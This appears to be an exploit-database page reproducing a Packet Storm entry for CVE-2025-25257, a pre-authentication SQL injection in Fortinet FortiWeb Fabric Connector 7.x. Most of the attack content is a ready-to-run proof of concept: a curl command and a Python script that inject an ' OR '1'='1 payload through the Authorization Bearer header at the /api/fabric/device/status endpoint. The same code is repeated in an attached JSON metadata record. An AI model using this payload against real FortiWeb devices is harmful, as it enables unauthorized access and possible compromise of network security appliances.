📄 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

FortiWeb.............................................

Visit Original Source

Basic Information

ID PACKETSTORM:210193

Published Oct 6, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).

PoC

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import requests

def test_sqli(base_url):
url = f"{base_url}/api/fabric/device/status"
headers = {
"Authorization": "Bearer aaa' OR '1'='1"
}
try:
response = requests.get(url, headers=headers, verify=False,
timeout=10)
print(f"Status code: {response.status_code}")
print("Response body:")
print(response.text)
except Exception as e:
print(f"Error: {e}")

if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
args = parser.parse_args()
test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5

{
    "lastseen": "2025-10-06T16:16:07",
    "description": "FortiWeb.............................................",
    "published": "2025-10-06T00:00:00",
    "modified": "2025-10-06T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:210193",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-25257"
    ],
    "sourceData": "# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL\n    Injection to Remote Code Execution\n    # Date: 2025-10-05\n    # Exploit Author: Milad Karimi (Ex3ptionaL)\n    # Contact: [email protected]\n    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL\n    # Tested on: Win, Ubuntu\n    # CVE : CVE-2025-25257\n    \n    Overview\n    \n    CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in\n    Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.\n    This flaw allows attackers to inject malicious SQL commands into the\n    vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).\n    \n    \n    PoC\n    \n    curl -k -H \"Authorization: Bearer aaa' OR '1'='1\" \\\n      https://<fortiweb-ip>/api/fabric/device/status\n    \n    PoC Python\n    \n    import requests\n    \n    def test_sqli(base_url):\n        url = f\"{base_url}/api/fabric/device/status\"\n        headers = {\n            \"Authorization\": \"Bearer aaa' OR '1'='1\"\n        }\n        try:\n            response = requests.get(url, headers=headers, verify=False,\n    timeout=10)\n            print(f\"Status code: {response.status_code}\")\n            print(\"Response body:\")\n            print(response.text)\n        except Exception as e:\n            print(f\"Error: {e}\")\n    \n    if __name__ == \"__main__\":\n        import argparse\n        parser = argparse.ArgumentParser(description=\"PoC SQLi By Ex3ptionaL\n    CVE-2025-25257 FortiWeb\")\n        parser.add_argument(\"base_url\", help=\"Base URL of FortiWeb (ex:\n    https://10.0.0.5)\")\n        args = parser.parse_args()\n        test_sqli(args.base_url)\n    # python3 src/poc.py https://10.0.0.5",
    "sourceHref": "https://packetstorm.news/download/210193",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/210193/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply